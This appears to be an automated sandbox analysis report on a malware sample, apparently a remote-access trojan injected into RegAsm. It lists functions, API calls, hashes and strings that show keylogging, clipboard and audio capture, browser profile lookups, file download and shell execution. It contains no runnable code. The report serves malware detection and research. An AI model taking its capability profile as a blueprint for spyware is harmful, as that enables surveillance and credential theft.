                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                          Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem
                                          • String ID:
                                          • API String ID: 4116985748-0
                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                          Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                          • String ID:
                                          • API String ID: 1761009282-0
                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                          Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                          Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 1000655C
                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                          Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                          • API String ID: 1881088180-3686566968
                                          • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                          • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                          Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                          Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 481472006-1507639952
                                          • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                          • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                          Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32 ref: 0041667B
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadFileSleep
                                          • String ID: !D@
                                          • API String ID: 1931167962-604454484
                                          • Opcode ID: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                          • Opcode Fuzzy Hash: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                          Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: : $Se.
                                          • API String ID: 4218353326-4089948878
                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                          Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: | $%02i:%02i:%02i:%03i
                                          • API String ID: 481472006-2430845779
                                          • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                          • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                          Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: alarm.wav$hYG
                                          • API String ID: 1174141254-2782910960
                                          • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                          • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                          • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                          • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                          Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped
                                          • API String ID: 1623830855-1496645233
                                          • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                          • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                          Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                          Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • waveInPrepareHeader.WINMM(006D9000,00000020,?), ref: 00401849
                                          • waveInAddBuffer.WINMM(006D9000,00000020), ref: 0040185F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferHeaderPrepare
                                          • String ID: XMG
                                          • API String ID: 2315374483-813777761
                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                          Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: IsValidLocaleName$kKD
                                          • API String ID: 1901932003-3269126172
                                          • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                          • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                          Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                          • API String ID: 1174141254-4188645398
                                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                          Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                          • API String ID: 1174141254-2800177040
                                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                          Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: AppData$\Opera Software\Opera Stable\
                                          • API String ID: 1174141254-1629609700
                                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                          Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: X8p
                                          • API String ID: 269201875-3665062877
                                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                          Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                          • String ID: [AltL]$[AltR]
                                          • API String ID: 2738857842-2658077756
                                          • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                          • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                          Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
